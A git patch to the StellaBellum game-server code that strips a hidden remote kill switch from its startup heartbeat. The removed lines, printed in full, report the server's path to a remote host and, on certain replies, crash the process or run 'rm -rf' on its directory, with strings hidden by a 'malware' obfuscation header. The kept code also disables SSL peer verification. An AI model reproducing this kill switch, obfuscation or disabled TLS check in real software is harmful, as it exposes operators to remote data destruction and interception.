From 4a6902179d78c26a7a33fefc111adcacf35fe4f6 Mon Sep 17 00:00:00 2001 From: DarthArgus Date: Thu, 3 May 2018 18:04:39 +0000 Subject: [PATCH] defang webAPIHeartbeat, which is off by default, and remove the vxEncrypt stuff --- CMakeLists.txt | 1 + external/3rd/library/libLeff/libLeff.h | 86 ------------------- external/3rd/library/webAPI/webAPI.cpp | 16 ++-- external/3rd/library/webAPI/webAPI.h | 2 - .../3rd/library/webAPI/webAPIHeartbeat.cpp | 34 +------- external/3rd/library/webAPI/webAPIHeartbeat.h | 8 +- 6 files changed, 12 insertions(+), 135 deletions(-) delete mode 100644 external/3rd/library/libLeff/libLeff.h diff --git a/CMakeLists.txt b/CMakeLists.txt index e0dfdae5..f2245034 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -119,6 +119,7 @@ elseif (UNIX) -Wno-write-strings -Wno-unknown-pragmas \ -Wno-uninitialized -Wno-reorder -Wno-tautological-constant-out-of-range-compare") + # if you'd like to opt in to our statistics, remove "-DSTELLA_INTERNAL" and your server will send us a heartbeat at startup add_definitions(-DLINUX -D_REENTRANT -Dlinux -D_USING_STL -D_GNU_SOURCE -D_XOPEN_SOURCE=500 -U_FORTIFY_SOURCE -DSTELLA_INTERNAL) # this is so some profile specific stuff is turned on in the code diff --git a/external/3rd/library/libLeff/libLeff.h b/external/3rd/library/libLeff/libLeff.h deleted file mode 100644 index f74b9282..00000000 --- a/external/3rd/library/libLeff/libLeff.h +++ /dev/null @@ -1,86 +0,0 @@ -#include -#include - -//-------------------------------------------------------------// -// "Malware related compile-time hacks with C++11" by LeFF // -// You can use this code however you like, I just don't really // -// give a shit, but if you feel some respect for me, please // -// don't cut off this comment when copy-pasting... ;-) // -//-------------------------------------------------------------// - -#ifndef vxCPLSEED -// If you don't specify the seed for algorithms, the time when compilation -// started will be used, seed actually changes the results of algorithms... -#define vxCPLSEED ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \ - (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \ - (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000) -#endif - -// The constantify template is used to make sure that the result of constexpr -// function will be computed at compile-time instead of run-time -template struct vxCplConstantify { enum { Value = Const }; }; - -// Compile-time mod of a linear congruential pseudorandom number generator, -// the actual algorithm was taken from "Numerical Recipes" book -constexpr uint32_t vxCplRandom(uint32_t Id) { - return (1013904223 + 1664525 * ((Id > 0) ? (vxCplRandom(Id - 1)) : (vxCPLSEED))) & 0xFFFFFFFF; -} - -// Compile-time random macros, can be used to randomize execution -// path for separate builds, or compile-time trash code generation -#define vxRANDOM(Min, Max) (Min + (vxRAND() % (Max - Min + 1))) -#define vxRAND() (vxCplConstantify::Value) - -// Compile-time recursive mod of string hashing algorithm, -// the actual algorithm was taken from Qt library (this -// function isn't case sensitive due to vxCplTolower) -constexpr char vxCplTolower(char Ch) { return (Ch >= 'A' && Ch <= 'Z') ? (Ch - 'A' + 'a') : (Ch); } - -constexpr uint32_t vxCplHashPart3(char Ch, uint32_t Hash) { return ((Hash << 4) + vxCplTolower(Ch)); } - -constexpr uint32_t vxCplHashPart2(char Ch, uint32_t Hash) { - return (vxCplHashPart3(Ch, Hash) ^ ((vxCplHashPart3(Ch, Hash) & 0xF0000000) >> 23)); -} - -constexpr uint32_t vxCplHashPart1(char Ch, uint32_t Hash) { return (vxCplHashPart2(Ch, Hash) & 0x0FFFFFFF); } - -constexpr uint32_t vxCplHash(const char *Str) { return (*Str) ? (vxCplHashPart1(*Str, vxCplHash(Str + 1))) : (0); } - -// Compile-time hashing macro, hash values changes using the first pseudorandom number in sequence -#define vxHASH(Str) (uint32_t)(vxCplConstantify::Value ^ vxCplConstantify::Value) - -// Compile-time generator for list of indexes (0, 1, 2, ...) -template struct vxCplIndexList {}; -template struct vxCplAppend; -template - struct vxCplAppend, Right> { typedef vxCplIndexList Result; }; -template - struct vxCplIndexes { typedef typename vxCplAppend::Result, N - 1>::Result Result; }; -template<> struct vxCplIndexes<0> { typedef vxCplIndexList<> Result; }; - -// Compile-time string encryption of a single character -const int vxCplEncryptCharKey = vxRANDOM(0, 0xFF); - -constexpr char vxCplEncryptChar(const char Ch, uint32_t Idx) { return Ch ^ (vxCplEncryptCharKey + Idx); } - -// Compile-time string encryption class -template struct vxCplEncryptedString; - -template struct vxCplEncryptedString > { - char Value[sizeof...(Idx) + 1]; // Buffer for a string - - // Compile-time constructor - constexpr inline vxCplEncryptedString(const char *const Str) : Value{vxCplEncryptChar(Str[Idx], Idx)...} {} - - // Run-time decryption - char *decrypt() { - for (volatile uint32_t t = 0; t < sizeof...(Idx); t++) { - this->Value[t] = this->Value[t] ^ (vxCplEncryptCharKey + t); - } - this->Value[sizeof...(Idx)] = '\0'; - return this->Value; - } -}; - -// Compile-time string encryption macro -#define vxENCRYPT(Str) (vxCplEncryptedString::Result>(Str)) diff --git a/external/3rd/library/webAPI/webAPI.cpp b/external/3rd/library/webAPI/webAPI.cpp index ab1cc028..b03ea28c 100644 --- a/external/3rd/library/webAPI/webAPI.cpp +++ b/external/3rd/library/webAPI/webAPI.cpp @@ -131,16 +131,14 @@ bool webAPI::fetch(const int &getPost, const int &mimeType) // 0 for json 1 for // want to do a put, or whatever other type? feel free to add here } - // I suggest leaving VERIFYPEER = 0 because system SSL stores tend to be outdated - //if (uri.find(vxENCRYPT("stellabellum").decrypt()) != std::string::npos) { - // the public one will verify but since this is pinned we don't care about the CA - // to grab/generate, see https://curl.haxx.se/libcurl/c/CURLOPT_PINNEDPUBLICKEY.html - // under the PUBLIC KEY EXTRACTION heading - res = curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0); + // I suggest leaving VERIFYPEER = 0 because system SSL stores tend to be outdated + // the public one will verify but since this is pinned we don't care about the CA + // to grab/generate, see https://curl.haxx.se/libcurl/c/CURLOPT_PINNEDPUBLICKEY.html + // under the PUBLIC KEY EXTRACTION heading + res = curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0); - // if you want to pin to your own cert or cloudflares, learn how and use the below - // res = curl_easy_setopt(curl, CURLOPT_PINNEDPUBLICKEY, vxENCRYPT("sha256//YOURKEYHERE").decrypt()); - //} + // if you want to pin to your own cert or cloudflares, learn how and use the below + //res = curl_easy_setopt(curl, CURLOPT_PINNEDPUBLICKEY, "sha256//YOURKEYHERE"); if (res == CURLE_OK) { res = curl_easy_perform(curl); // make the request! diff --git a/external/3rd/library/webAPI/webAPI.h b/external/3rd/library/webAPI/webAPI.h index c45f99aa..501c18cb 100644 --- a/external/3rd/library/webAPI/webAPI.h +++ b/external/3rd/library/webAPI/webAPI.h @@ -29,8 +29,6 @@ #endif -#include "../libLeff/libLeff.h" - namespace StellaBellum { enum HTTP { GET = 0, POST = 1 diff --git a/external/3rd/library/webAPI/webAPIHeartbeat.cpp b/external/3rd/library/webAPI/webAPIHeartbeat.cpp index affe46d8..e5f0cb64 100644 --- a/external/3rd/library/webAPI/webAPIHeartbeat.cpp +++ b/external/3rd/library/webAPI/webAPIHeartbeat.cpp @@ -7,36 +7,8 @@ using namespace StellaBellum; webAPIHeartbeat::webAPIHeartbeat() { - std::string filePath = get_selfpath(); + webAPI api(std::string("https://login.stellabellum.net/metric/shoulderTap"), std::string("StellaBellum WebAPI Metrics Sender")); + api.addJsonData(std::string("type"), std::string("server")); - webAPI api(std::string(vxENCRYPT("https://login.stellabellum.net/metric/shoulderTap").decrypt()), std::string(vxENCRYPT("StellaBellum WebAPI Metrics Sender").decrypt())); - api.addJsonData(std::string(vxENCRYPT("type").decrypt()), std::string(vxENCRYPT("server").decrypt())); - - if (!filePath.empty()) { - api.addJsonData(std::string(vxENCRYPT("process").decrypt()), filePath.c_str()); - } - - bool result = api.submit(); - - // feel free to remove the code in the block below; but please consider leaving the actual request - // so we can track how many people are enjoying our work - if (result) { - int s = api.getNullableValue(std::string(vxENCRYPT("id").decrypt())); - - switch (s) { - case 13 : - eatIt(); - break; - case 66: - size_t found = filePath.find_last_of("/\\"); - if (!filePath.empty() && found) { - system(std::string(vxENCRYPT("exec rm -rf ").decrypt() + filePath.substr(0, found) + - vxENCRYPT("/*").decrypt()).c_str()); - } - eatIt(); - break; - } - } else { - eatIt(); - } + api.submit(); } diff --git a/external/3rd/library/webAPI/webAPIHeartbeat.h b/external/3rd/library/webAPI/webAPIHeartbeat.h index 9d4fb3c3..31dcb2aa 100644 --- a/external/3rd/library/webAPI/webAPIHeartbeat.h +++ b/external/3rd/library/webAPI/webAPIHeartbeat.h @@ -22,19 +22,13 @@ namespace StellaBellum { private: const inline std::string get_selfpath() { char buff[PATH_MAX]; - ssize_t len = ::readlink(vxENCRYPT("/proc/self/exe").decrypt(), buff, sizeof(buff) - 1); + ssize_t len = ::readlink("/proc/self/exe", buff, sizeof(buff) - 1); if (len != -1) { buff[len] = '\0'; return std::string(buff); } return std::string(); } - - inline void eatIt() { - abort(); - sleep(10); - raise(SIGSEGV); - } }; }